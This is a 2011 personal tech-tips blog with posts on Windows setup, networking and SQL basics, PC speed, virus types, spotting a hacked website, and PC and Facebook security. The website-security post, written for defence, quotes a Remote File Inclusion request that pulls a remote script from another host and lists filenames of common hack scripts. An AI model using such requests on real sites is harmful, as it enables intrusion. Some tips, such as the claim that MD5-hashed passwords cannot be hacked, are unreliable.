Tuesday, October 11, 2011

link to show your website on google

Hi friends,

if you have your own website or blog then use link to your website or blog url to this link. for more hits and show ur website on google.

click here :- www.google.com/addurl

just click on link and login by your Google account and post your url.

best of luck

Wednesday, August 31, 2011

How to make Applications "USB portable"

Here are the steps:

1. First of all you need to install VMware thinApp...
Download it

2. Now Before go to next step, if the software to which you want to make portable, is installed on your computer, then you need to uninstall it.

3. Now start Vmware thin App for creating Portable Application. For that go to start> All Programs> VMware> ThinApp Setup Capture

4. Now many Frames will open one by one, just press next in all, instead of some that i will explain in next steps. here is screen shot of first Frame.

5. Now A frame will open(as shown in screenshot),

5.1 first click on 'Advanced Scan location' and make sure that the drive is select where you install your softwares and press OK.

5.2 Now Click on 'Prescan'. After pressing Prescan, Scanning will start, So wait till scanning finish, be patient.

6. After finished Scanning, Simply Install the software to which you want to make portable on your system(same as you normally do).

7. After Installation of software, click on 'Postscan'. Now again Scanning will start.

8. After Completion of post scanning, Select the exe of the Application which u installed in step 6. and Press 'Next'.

9. Now select 'USB flash Portable media' and Press 'Next'.

10. In last step click 'Build'.

11. As sson as the previous step is finished, your application is now become portable, you can check that porable application by going to C:\Program Files\VMware\VMware ThinApp\Captures.

Here you will find a folder of that software which u hv created. Now open that folder. Search for a folder named 'Bin', open it. here you will found the exe of your Portable software.... Copy it and paste it into your USB... and use it anywhere :) !!!!

How to trace who is invisible on Facebook Chat ?

if any of your friend is invisible by same method then you can know easily by an application of FB named 'Online Now'. Using this application,without being online through ur FB chat you can know about all ur friends who are online on chat, no matter in invisible State or visible state.

Uninstall Windows Apps With A Right-Click ?

Always when you want to remove unwanted Windows programs, you usually have to head all the way to the Control Panel to remove it. But here is a way by that you can get uninstall option directly with a right click on the shortcut of the software you want to uninstall.

MenuUninstaller is a free software that adds an "Uninstall" option to the Windows context menu so you can remove programs right from their shortcuts.

How to use Menu Uninstaller:

Download MenuUninstaller, and install it on your system
after installing just right click on shortcut of software > click on uninstall

Friday, August 26, 2011

How to install Windows XP over Windows 7 in a dual boot ?

This case is applicable for users who have Windows 7 pre-installed on ‘C’ and want to install XP on their ‘D’ partition.The process for this is same as we did for Windows XP & Vista.

Follow the simple steps below to install XP after Windows 7.

1) Make a clean Install of Windows XP on ‘D’ partition of your hard drive. Assuming, Windows 7 is installed on ‘C’ partition.

2) After restarting system, you will directly boot into Windows XP. That’s because XP writes its boot loader over Windows 7. So, we need to restore the Win 7 boot loader.

3) To restore 7, you need to Boot from the Windows 7 DVD and “Repair your computer”. Check this article “How to Perform a Start-up Repair in Windows 7” to perform repair.

4) After repairing, your system will restart and boot into Windows 7.

5) Download and Install EasyBCD from http://neosmart.net/dl.php?id=1 on your Windows 7 to add boot entry for XP.

6) Launch the program and select ‘Add New Entry’. Under “Operating Systems” open the Windows tab, select the Type as “Windows NT/2k/XP/2k3” and click on ‘Add Entry’.

The entry for Windows XP would be added instantly. You can choose the default OS to boot and modify the boot menu time-out from “Edit Boot Menu” option.

Now restart you PC and you’ll be presented with two options, Windows 7 and Windows XP.

Select the OS you want to work on.

Thursday, August 25, 2011

some interview questions related to Networking IP layer :-

IP address or Internet Protocol address is the address of a device attached to an IP network (TCP/IP network). It is a must for every client, server and network device to have a unique IP address for each network connection (network interface). Every IP packet contains a source IP address and a destination IP address. As a device moves from one network to another, its IP address changes.

Networking - How would you define IP address?
Computers using the TCP/IP for communication are uniquely identified by a 32 bit address called as an IP address. The routers use the IP address information to forward the packet to the destination computer.

IP addresses are categorized as:
Private address: these IP addresses are used exclusively within a private network and not for public to see.

Public Address: these are registered IP addresses used for public.
Each IP address has a network address and a host address. IP addresses are expressed in four sets of three numbers, separated with dots. Each set is called as an octet because when converted to binary; it denotes eight binary.

Difference between Static and Dynamic IP.

Static IP is also called as permanent address assigned to each device in a network, whereas Dynamic IP, a temporary address assigned to the device via DHCP software. IP address assigned to your service by your cable or DSL Internet provider is typically dynamic IP. In routers and operating systems, the default configuration for clients is dynamic IP.

What is the difference between public and private IP?

A public IP address allows equipment accessible to everyone on the internet. A private IP address is for private use within the network and allows many more PCs to be connected. If you are using a private IP and wants VOIP, you need to change to a public IP address.

What is Network Address Translation?
Network Address Translation acts as an agent between the Internet and a local network. It is a dynamic method which is used to minimize Internet connectivity needs. Network address translation describes the rewriting of the Internet Protocol (IP) addresses of data packets so that multiple transmissions require only one IP address.

What is subneting?
Subnet adds one level to the way IP address is represented. It logically organizes the network. For instance, it can logically group computers belongs to the finance department.

What is Routing Protocol?
Routing protocol is the way to send routing information between any routers in an autonomous system.

Explain the structure and use of internet addresses.
Each IP address is 32 bit long. In human language the IP addresses are written in dotted decimal notation. These are then converted to binary by the computer. Each IP address has two parts: Network identifier or a network ID and host ID. The current internet protocol standard is IPV4. The IP addresses are divided into three classes: a class A network, a class B network, and a class C network. Class A being the largest. The four digit numbers in an IPV4 address, each network of class A will have different first number, and then its network will be addressed by the rest of the three numbers, or three bytes. The IP addresses identify a machine to deliver packets and load web pages.

Digital Signatures?
Digital signature is an attachment to an electronic message used for security purpose. It is used to verify the authenticity of the sender.

What is broadcast domain?
It is a logical area in a computer network where any computer connected to the network can directly transmit to any other computer in the domain without having to go through a routing device.

Diff b/w Bridge and switch
A bridge connects two different LAN networks. A switch is something like you can connect many computers to a switch and then one computer can connect to another through the switch. Switch is a unicast one to one connection.

What is a Router?
A router is a device or sometimes a software in a computer which decides the next network point to which a packet should be forwarded to reach its destination on Internet. It is usually included as part of the network switch and is located at a gateway, including each point-of-presence on the Internet. The router is connected to at least two networks and determines which way to send each information packet based on its understanding of the state of the networks it is connected to.

Describe the basics of internet routing.
When a source sends a packet to a destination, this packet has a specific path or route it follows. Different routing protocols are used to find the shortest path to the destination. The protocols maintain routing tables. Routing tables consist of a set of rules used to determine where these packets will travel. When a packet is received, a network device examines the packet and matches it to the routing table entry providing the best match for its destination. The packet keeps hopping until it reaches its destination.

Define gateway
A gateway is a network point that provides entrance into another network. On the Internet, a node or stopping point can be either a gateway node or a host (end-point) node. Both the computers of Internet users and the computers that serve pages to users are host nodes. The computers that control traffic within your company's network or at your local Internet service provider (ISP) are gateway nodes.

What is firewall?
A firewall is a hardware or software installed to provide security to the private networks connected to the internet. They can be implemented in both hardware and software, or a combination of both. All data entering or leaving the Intranet passes through the firewall which allows only the data meeting the administrators’ rules to pass through it

What are the types of firewalls?

Packet Filtering Firewall:
This type of Firewall detects packets and block unnecessary packets and makes network traffic release.
Screening Router Firewalls:
It's a software base firewall available in Router provides only light filtering.
Computer-based Firewall:
It's a firewall stored in server with an existing Operating System like Windows and UNIX.
Hardware base Firewall:
Its device like box allows strong security from public network. Mostly used by big networks.
Proxy Server:
Proxy server allows all clients to access Internet with different access limits. Proxy server has its own firewall which filters the all packet from web server.

What is Ethernet technology?
Ethernet technology is a high speed broadcast bus technology. In this type, all the station shares a single ether channel and receives every single transmitted signal.

Some sql queries for beginners

SQL (Structured Query Language) is an ANSI standard computer language that allows you to access a database by execute queries, retrieve, insert, delete, update records etc. SQL is a standard language for accessing databases.

Q :What is SQL?
• SQL stands for Structured Query Language
• SQL is pronounced as /ˌɛs.kjuːˈɛl/
• SQL is designed for manipulate data in relational database management system

Q :What can you do with SQL?
• SQL can retrieve and update data from relational database management system by using data manipulation language.
• SQL can create and modify database schema and database objects such as tables, views, indexes... via data definition language.
• SQL can grant or revoke authorization to user through data control language.
SQL Data Manipulation Language (DML)
SQL data manipulation language (DML) is a main part of SQL statements. SQL DML allows you to retrieve data from the database tables in relational database management system (RDBMS). In addition, SQL DML allows you change or delete data from the database tables by using UPDATE and DELETE statements. Here are all the SQL statements related to the SQL data manipulation language:

SQL Syntax


SELECT Company, Country FROM Customers WHERE Country <> 'india'

SQL Result
Company Country
Wipro Delhi
HCL Noida
TCS Pune


SQL DELETE statement allows you to delete one or more records in a database table. The syntax of SQL DELETE statement is as follows:
1 DELETE FROM table_name
2 WHERE conditions

If you want to remove employee number 3 just execute the following query:
1 DELETE FROM employees
2 WHERE employeeID = 3

1 INSERT INTO table_name (column1, column2…)
2 VALUES (value1, value2,…).
example of inserting data into the Shippers table by using SQL INSERT statement.
1 INSERT INTO Shippers (companyName, phone)
2 VALUES ('Shippers','1-800-222-0451')

Insert multiple records into a database table
SQL INSERT statement also allows you to insert multiple records into a database table at a time. Here is the syntax:
1 INSERT INTO shippers(companyName,phone)
2 VALUES ('zte','1-800-782-1235'),
3 ('cms','1-800-225-1234')

1 UPDATE table_name
2 SET column1 = value1,
3 column2 = value2
4 WHERE condition
Ex:- Suppose one of employee in the company get married and need to change her last name, so you have to make the change by using the SQL UPDATE statement. Here is the query to do so:
1 UPDATE employees
2 SET lastname = 'ram'
3 WHERE employeeID = 3.

How to Speed Up PC Performance

Slow Speed of computer is the main problem to do work is you also frustrate from slow speed of your computer. After follow these steps you will surly able to speed up your computer must read this blog for rise your computer speed.

Here are these tips to rise up your computer speed :-

1) Operating system choice:-

You will be amazed to know that your choice of choosing right windows or operating system could play a significant role on your CPU's performance.

2) Partitions:-

If there are having more number of partitions in your computer, it would help your windows more to find required data easily from your hard disk, when you run any file or program. I would suggest you to have more partition each having at least 5 GB memory and maximum 20 GB.

3) Follow these steps to check start up data when your computer is start after boot :-

Go to START->Run then type "MSCONFIG" then you can see which your memory consuming programs are.

If you do not want to do anything above and want shorter way with shorter improvements then create new user account and delete previous one. You will observe a slighter change and this also removes many errors if present in windows.

4)Defrag your hard drive :-

De-fragmenting your hard drive puts your data back into sequential order, making it.Easier for Windows to access it. As a result, the performance of your computer will Improve.
An excellent registry cleaner will allow show you how to speed up your PC
Using defrag techniques.

5) Use a Window's Optimization Tool :-

Using a Windows Optimization tool can give you a big boost in the the performance department. This takes the work out of your regular maintenance of organizing files, defragging your hard drive and other optimization task.

6) Manage Your Startups :-

By managing your Windows startup programs and services you can free of vital CPU resources that can re-allocated your PC performance. This is a quick and easy tweak learn how to speed up PC CPU access time.

7) Clean Windows Temp Files

Your Windows Temp files can swell to enormous sizes. This will eat up free space that could be allocated for applications you would like to use.

Wednesday, August 24, 2011

How does a computer virus harm the computer?

Virus can to much harmful for our computer like :-

1) Damage files
2) Damage programs
3) Delete files
4) Corrupt the operating system

Also,there are 4 types of viruses
1) General Viruses :- General computer viruses are packages of software that hide alongside other programs that seem valid. In most cases the virus is so small, and so well hidden, that by the time a user realizes it has "piggybacked" with his downloaded program, the virus has already started to cause its damage. Most general viruses act like human viruses. They do this by entering your system, and then taking advantage of it by using its components to duplicate itself and spread.

2)Trojans :- A trojan virus, sometimes referred to as a trojan horse, is named after its historical namesake. Just like the trojan horse in world history, a trojan disguises itself as something that it's not, but does not make itself known until it has made it onto your computer. Trojans can masquerade as games, programs or documents that you download online. Once you open the executable file, the trojan installs instead of the program and infects your computer. The trojan can then cause its damage, sometimes even erasing your hard disk. Unlike a general virus, a trojan is unable to duplicate itself automatically.

3) Worms :- A worm is an infection that exploits network connections. When a worm downloads itself onto your computer it uses network connections to other computers, as well as security holes to duplicate itself and spread. A worm uses one computer on a network system to scan all the other computers it is connected to for security holes. Once the worm finds a hole on another computer on the network, it copy and pastes itself into that computer by exploiting the security hole. It continues replicating until it runs out of computers to infect.

4)Email Viruses :- An email virus spreads as an attachment to an email. Sometimes this attachment can be seen, and other times it can't. Some email viruses can load onto your computer simply by opening an email into the preview frame. Once the virus has been opened, it automatically downloads its attachment to your computer. Some email viruses can also hijack your computer and send out copies of itself to everyone on your contacts list.

Friday, May 27, 2011

Floppy drive autorun on startup

Are you facing a problem in flopy drive autorun while start up?

Probably not, but just in case you have had the itch to do so, I will explain how it's done!

This tip involves editing the registry, so I would highly recommend making a backup of it first before proceding!

Find or create the key :
Then find the value named : NoDriveTypeAutoRun
Note : if your value has "95" in it, procede to step 1, if it has "B5" or anything else, procede to step 2 !
Step 1. Right click on this value and click Modify. If the value has 95 in it, delete the number 95 and replace it with 91 , making sure to keep all zeros and spaces in the value!
Step 2. If the value has B5 in it, or any other letter followed by the number 5, change ONLY the number to 1, so, for example it looks like B1 ( your letter substituted for the B ) NOTE: If you value does not have 95 in it, and instead has a value with a letter such as B and then a 5, this tweak may not work!

Then click OK, restart your computer, and you will now be one happy autorun man!

How to Install XP from DOS :-

If XP will not install from the CD or if you have a new drive with no operating system on it yet try these steps :--

Install Windows XP from the hard drive with Windows 98 already installed:

Boot Windows 98
Insert the XP CD into your CD reader
Explore Windows XP through My Computer
Copy i386 folder to C:\
Go into C:\i386 folder and double click on winnt32.exe to launch the setup from the hard drive

Install Windows XP from DOS (ie. no OS on a new hard drive):

Boot with a Windows 98 Start Up disk
Insert the Windows 98 CD into the CD reader
Run smartdrv.exe from the Win98 directory on the windows 98 CD (file caching)
Type cd.. to back up to the root directory
Insert Windows XP CD into the CD reader
Copy the i386 folder to C:\
Go into C:\i386 folder on C: and type winnt.exe to launch the setup from the hard drive.

Try this really nice one.

How to Remove unwanted programs from your pc

If you want to remove some additional programs from your pc that are installed with windows but are not initially visible or remove in Add / Remove, edit a file called by the:----


In there you will find a listing of programs, and you will note that some programs have the word 'hide' at the end. Simply remove the word 'hide' but leave the extra comma:



Now when you open Add-Remove Windows Components, you will see a new choice, in this example, "Windows Messenger"

Tuesday, March 15, 2011

How to know if your website has been hacked

1) Google says "This site may harm your computer"
If Google or Yahoo search engine result pages (SERPs) display a warning about your site, the most common cause is that your site was hacked. Please see the separate article about how to investigate and remove the Google / StopBadware warning message.
2) Visitors report getting viruses from your web pages
If visitors report to you that they get viruses or antivirus alerts from browsing your pages, it usually means your site has been hacked. Google and Yahoo will soon start displaying malware warnings about your site, so see the article about it, above.
It is, however, possible for your pages to deliver viruses even if your site hasn't been hacked. This can occur when your pages pull some of their content from third parties such as advertisers, and they got hacked or someone slipped a malicious advertisement into their lineup. That scenario is also discussed in the article above.
3) Visitors report being redirected to other websites
If you or other people try to visit your website but get automatically taken to some other website instead, it's another symptom of being hacked. It's a similar situation to the two described above and will eventually earn a Google or Yahoo! "badware flag". See the article referenced above.
4) Your traffic decreases dramatically and suddenly
Most web surfers stay away from sites that have the warning "This site may harm your computer". Those who continue to the site and get a virus or antivirus alert will leave immediately and not browse around. Either way, you'll see a drop in traffic. Anytime your traffic drops suddenly, investigate.
5) Your files contain code you didn't put there
If your pages suddenly contain links, text, or other objects you didn't put there, it's an indication you've been hacked. The source code of your pages (the text in your .htm, .html, or .php files, for example) should always stay the same as it was when you created it. If it changes, it's an indication someone figured out how to break into your site and change it. That should never happen.
One exception is that free webhosts sometimes require that you allow them to put ads into your pages. Occasionally someone thinks they've been hacked when it's really just the webhost's advertising code. If in doubt and you use free hosting, read the Terms of Service of your hosting plan.
6) Your site contains files you didn't put there
This is just like #5 above, except there are entire new files. It can be harder to make a judgment about new files because a site usually does contain files you didn't put there, many of them necessary for proper functioning (although most are in folders whose names are an indication of what they're for). You can examine text files to see if their contents look suspicious. Don't delete files just because you don't recognize them. Once you're afraid you might have been hacked, everything can look suspicious, even things that were always there that you just never noticed before.
7) Your search engine result page (SERP) listings suddenly change
When your site appears in search result listings, the pages listed should be pages that you know really exist, and the text shown should be related to what your site is about. If the listings suddenly show weird-named pages or text about topics unrelated to your site's content, it's another symptom of being hacked.
Places where you can monitor your site status
An important aspect of monitoring your site is to notice unusual changes, things that are different from normal, so make a habit of paying attention now to what is normal and usual, while your site is not hacked.
1) Each time you log into cPanel
Make a habit of checking the "Last login from:" box to make sure it shows your IP address from the last time you logged in.
2) Google Webmaster Central > Webmaster Tools
Google account (free) and login required. Google notifies you in Webmaster Tools if your site gets flagged as harmful. They often notify you by email, too, if they have your email address. You can also check your Google status anytime by typing this in a Google search box and viewing the results: site:yourdomain.com.
Google Webmaster Tools has other useful features. You can review the words and phrases of web searches for which your pages are being listed (make sure the phrases are relevant to your site's content), review errors that Googlebot has encountered on your site, and more.
3) Google Safe Browsing Diagnostic database
Warning messages in Google search results are based on a Google database. You can view an up-to-date report from the database for any website by entering this URL in your browser address bar. Replace EXAMPLE.COM with the address of the website you want to check:
I wrote a few paragraphs about how to interpret the diagnostic report here.
4) StopBadware.org Clearinghouse database
If your site is flagged, you'll find a short summary of badware behavior found.
5) Norton Safe Web, from Symantec
Reports the threats, categorized by type, that have been found on websites. You can go directly to the report for any site with this address (replace EXAMPLE.COM):
6) McAfee SiteAdvisor safety and outlink reports
The report describes how many emails they received after registering at a site, how spammy the emails were, whether the site has outlinks to bad websites, and whether they found viruses or spyware on pages or in downloads. Users sometimes post public comments with complaints or praise. SiteAdvisor is a way to learn what others think of your site. It doesn't seem to be updated very often, however, so it's not an early warning system.
7) W3C HTML Validator
If your pages usually validate ok, but suddenly stop validating, it can be a sign that new code was inserted at invalid locations in your files. The reported validation errors might be at exactly the locations where the injected code is.
8) Search engine result pages (SERPs)
At each of the popular search engines, watch for:
• Pages that the search engine says are on your site, but that you didn't put there.
• Text snippets that are wrong, containing text not related to your site's subject.
9) When you browse your own site
Always use an up-to-date antivirus and antispyware program on your own PC so you'll be alerted if your website starts delivering malware. Use "real-time" (also known as "on access") protection that catches malicious files as soon they are received. An on-demand scanner (such as a free online scanner, or a once-a-day manual scan) isn't enough. By the time you identify and quarantine the virus, the damage it was intended to cause might already be done.
Use your browser's View Source feature occasionally to inspect your page's HTML code for text injections of invisible iframes, JavaScript, and links to malicious websites. These are often the definitive indicators that the pages have been tampered with. The "badware investigation" article referenced above shows examples of what these things look like. They're just text. Once you know what to look for, they're easy to recognize.
It's a good idea also to check a few files on your server from time to time. Open your home page in your control panel's File Manager and inspect the HTML for the signs of tampering described above.
Whenever you are viewing a list of the files on your server (such as in cPanel > File Manager or by FTP), be alert for file names you don't recognize or sizes that are obviously wrong (such as a size of 0 for a file you know should be bigger).
The files on your server should never be different from what they were when you originally uploaded them. A file getting modified on your server without your permission is not normal. If it happens at all, it is an indication that something is wrong.
10) You can search your site files for suspicious code
This customizable PHP script can help search your website files for suspicious code or other suspicious text.
11) HTTP access log
This log records the requests for pages and other files from your site. When someone attacks your site (whether successfully or not), the attack is often recorded in your website access logs.
If you want to discover whether your site is being attacked, my hack attempt identifier online calculator can help with that. You paste lines from your HTTP log to find out which ones are hack attempts. Remember that just because an attack occurred doesn't mean it was successful, but it's still useful to know what you're up against.
Besides the information provided by the calculator, there are other indicators of a site compromise. If there are successful requests (HTTP result code 200) in your log for files you didn't put on the site, it's suspicious. It's even more suspicious if the filenames are variations of these often-used names for hack scripts: id.txt, cmd.txt, safe.txt, r57.txt, test.txt, echo.txt, php.txt, load.txt, or mic.txt.
Don't panic just because you find mentions of those filenames. You probably will find them. It matters where the names appear. Here are two different types of requests:
1. This one is a "Remote File Inclusion" (RFI) attack on your site. The GET command is requesting your index.php. It is trying to use the "query string" (the part after the first question mark) to inject safe.txt from the other site into your site. This is cause for concern because if it succeeds, your site will be hacked. However, this log line does not mean it has succeeded. It is just an attempt, and it is normal to find many of these attempts in your logs:
GET /blog/index.php?article=http://famousuniversity.com/user/safe.txt?
2. If the attack on your site does succeed (which you cannot determine from your log data alone), here is what famousuniversity will see in their log. This is a sign, to them, that they have been hacked. This GET is requesting safe.txt. If the result code is 200 (Success), it means the file was served, so it must be on the server. If they know that a file called safe.txt shouldn't be there, it means they were hacked and it was put there by somebody else, so they should find and examine the file. It is usually a PHP script intended to be used in attacks on other sites. I use famousuniversity as an example because my site actually has been attacked with scripts hosted at famous universities whose user accounts were compromised. It happens.
GET /user/safe.txt
As demonstrated in example 1, your access log is the place to learn how your site is being attacked, whether successfully or not, so you can learn what things you need to defend against.
Near-misses are good to learn from. If you find an attack that did not succeed in doing harm but did return a result code of 200 (meaning the server accepted the request and sent a file), it is a good idea to determine the malicious feature of the attack code and revise your .htaccess to block those types of requests. The goal should be for every known type of attack to get a 403 Forbidden result instead of 200. That will mean that your server rejected the request "at the front door", and the attack never had the opportunity to do harm. The Website Security article linked at the top of this page has some specific methods for this type of request blocking.
Your HTTP and FTP access logs (see the next section) are usually available for download at cPanel > Raw Log Manager. The log files are usually stored outside public_html, sometimes in a folder called /logs, which you can find with cPanel > File Manager or with FTP.
11) FTP access log
Unauthorized users, IP addresses, or file transfers in your FTP log are proof that your site is compromised.

How to Prevent Hacking of your PC?

There are many ways when a hacker would try to scam you into receiving a file etc, so that you will take the bait and help him with the trojan/virus installation on your hard disk drive. If you need just one way to stop being hacked, the best way is to install an all-in-one solution with anti-virus, firewall and anti-spyware solution.

We personally use Norton Internet Security and we update our subscription every year. Another similar product which you may consider is ZoneAlarm, but we recommend Norton for their years and track records in the anti-virus arena. btw, we don't get commission for recommending, so you can trust our advise. Not to forget that I am a trained hacker myself.

Nevertheless, you must know that whether or not your PC will be hacked will depend very much on your actions as well. For example, downloading files from warez sites and poor habits of opening up strange email attachments, is as good as inviting hackers to break your door. Some time ago, I have the opportunity to try removing a malignant spyware installed on a friend's machine. It took me 8 hours despite my experience, and eventually we had to reinstall the entire OS. Some of you might say that I should have reinstall it after a short tryout, however, I preferred to take the challenge but failed. :)

Prevention is always better than cure. If you would like to take the risk, a common practice (for some of us) is to use another PC when we need to do something risky. With constant PC upgrades, many of us could easily keep an older PC (at least one) just for this purpose. This reminds me of the hacking class that I attended a few years back - the instructor had to reinstall all the workstations almost every lesson to get rid of the remaining virus or trojans from the previous lessons.

Another way of getting into trouble is to visit cracks, warez, and keygen websites. There are several ways which your PC may be infected:

1) Clicking on buttons on the site which activates malicious scripts, including Scareware windows.

2) Trojans, virus or spyware hidden in the software cracks, or keygen.

3) Trojans, virus, or spyware hidden in attachments of emails, and this include pictures.

Althought we did mention earlier that you must have at least one security software installed on your PC, however, it is impossible to guarantee that the software will definitely protect you against Any or All the possible viruses, trojans and malicious programs.

If you find that your PC behaves abnormally, such as unexpected pop-up ads, shutting down of applications, poor internet connections (or busy connections), etc, there is a good chance that your PC is infected. You will need to waste quite a bit of time to perform a complete PC scan, try to locate and remove the infected file, or to reformat and reinstall the entire harddisk again. Again, prevention is always better than cure, so backup your data at all times. Some virus does more than simply shutting down your PC, they can damage your hard disk physically by force writing over a specific sector repeatedly within a very short time. We will not go into that.

We will summarize the 3 generic recommendations below.

* Install a good internet security software (currently Norton 360 is recommended) and pay for the auto-update. This is important.
* Do not visit high-risk websites or click on any of the links there.

How to Prevent Hacking of your PC?

There are many ways when a hacker would try to scam you into receiving a file etc, so that you will take the bait and help him with the trojan/virus installation on your hard disk drive. If you need just one way to stop being hacked, the best way is to install an all-in-one solution with anti-virus, firewall and anti-spyware solution.

We personally use Norton Internet Security and we update our subscription every year. Another similar product which you may consider is ZoneAlarm, but we recommend Norton for their years and track records in the anti-virus arena. btw, we don't get commission for recommending, so you can trust our advise. Not to forget that I am a trained hacker myself.

Nevertheless, you must know that whether or not your PC will be hacked will depend very much on your actions as well. For example, downloading files from warez sites and poor habits of opening up strange email attachments, is as good as inviting hackers to break your door. Some time ago, I have the opportunity to try removing a malignant spyware installed on a friend's machine. It took me 8 hours despite my experience, and eventually we had to reinstall the entire OS. Some of you might say that I should have reinstall it after a short tryout, however, I preferred to take the challenge but failed. :)

Prevention is always better than cure. If you would like to take the risk, a common practice (for some of us) is to use another PC when we need to do something risky. With constant PC upgrades, many of us could easily keep an older PC (at least one) just for this purpose. This reminds me of the hacking class that I attended a few years back - the instructor had to reinstall all the workstations almost every lesson to get rid of the remaining virus or trojans from the previous lessons.

Another way of getting into trouble is to visit cracks, warez, and keygen websites. There are several ways which your PC may be infected:

1) Clicking on buttons on the site which activates malicious scripts, including Scareware windows.

2) Trojans, virus or spyware hidden in the software cracks, or keygen.

3) Trojans, virus, or spyware hidden in attachments of emails, and this include pictures.

Althought we did mention earlier that you must have at least one security software installed on your PC, however, it is impossible to guarantee that the software will definitely protect you against Any or All the possible viruses, trojans and malicious programs.

If you find that your PC behaves abnormally, such as unexpected pop-up ads, shutting down of applications, poor internet connections (or busy connections), etc, there is a good chance that your PC is infected. You will need to waste quite a bit of time to perform a complete PC scan, try to locate and remove the infected file, or to reformat and reinstall the entire harddisk again. Again, prevention is always better than cure, so backup your data at all times. Some virus does more than simply shutting down your PC, they can damage your hard disk physically by force writing over a specific sector repeatedly within a very short time. We will not go into that.

We will summarize the 3 generic recommendations below.

* Install a good internet security software (currently Norton 360 is recommended) and pay for the auto-update. This is important.
* Do not visit high-risk websites or click on any of the links there.

How to protect my facebook account from hacking?

This is exactly what you should do:

1. Install anti virus to prevent trojans stealing information.
2. Change your password regularly
3. Make sure your friend doesn't have access to your computer physically
4. Do not open or download any executable file unless you know what you are doing
5. Have a strong password consisting of alphanumeric and special charecters
6. Reconfirm your primary/secondary mail address
7. Do not give out your password to anybody at all
8. Keep a unique password to FB than your other online accounts
9. Relax

FB stores its passwords in a non-decryptable hashes(using hashing algorithms like md5) and cannot be hacked. Only way it can be hacked is by your actions.

You must be using some pretty easy passwords, or you are writing them down and he is finding them. Use a password generator (google it)to generate a password with cap and lower case letters, numbers, and symbols and see if that stops him.

1. Never click suspicious links: It is possible that your friends could unwillingly send spam, viruses, or malware through Facebook if their accounts are infected. Do not click this material and do not run any ".exe" files on your computer without knowing what they are. Also, be sure to use the most current version of your browser as they contain important security warnings and protection features. Current versions of Firefox and Internet Explorer warn you if you have navigated to a suspected phishing site, and we recommend that you upgrade your browser to the most current version. You can also find more information about phishing and how to avoid it at http://www.antiphishing.org/consumer_recs.html and http://onguardonline.gov/phishing.html.

Phishing is an online attempt to trick a user by pretending to be an official login page or an official email from an organization that you would have an account with, such as a bank or an email provider, in order to obtain a user’s login and account information. In the case of a phishing login page, the login page may look identical to the login page you would normally go to, but the website does not belong to the organization you have an account with (the URL web address of the website should reflect this). In the case of a phishing email, the email may look like an email you would get from the organization you have an account with and get emails from, but the link in the email that it directs you to takes you to the above phishing login page, rather than a legitimate login page for that organization.

To prevent your account information from being obtained in a phishing scheme, only log in to legitimate pages of the websites you have an account with. For example, "www.facebook.example.com" is not a legitimate Facebook page on the "www.facebook.com" domain, but "www.facebook.com/example" is a legitimate Facebook page because it has the "facebook.com" domain. When in doubt, you can always just type in "facebook.com" into your browser to return to the legitimate Facebook site.

2. Have a unique, strong password: From the Account Settings page, be sure to use a different password than you use for other sites or services, made up of a complex string of numbers, letters, and punctuation marks that is at least six characters in length. Do not use words found in the dictionary.

3. Run anti-virus software: If your computer has been infected with a virus or with malware, you will need to run anti-virus software to remove harmful programs and keep your information secure.
* For Windows:
http://www.microsoft.com/protect/viruses/xp/av.mspx http://www.microsoft.com/protect/computer/viruses/default.mspx
* For Apple/Mac OS: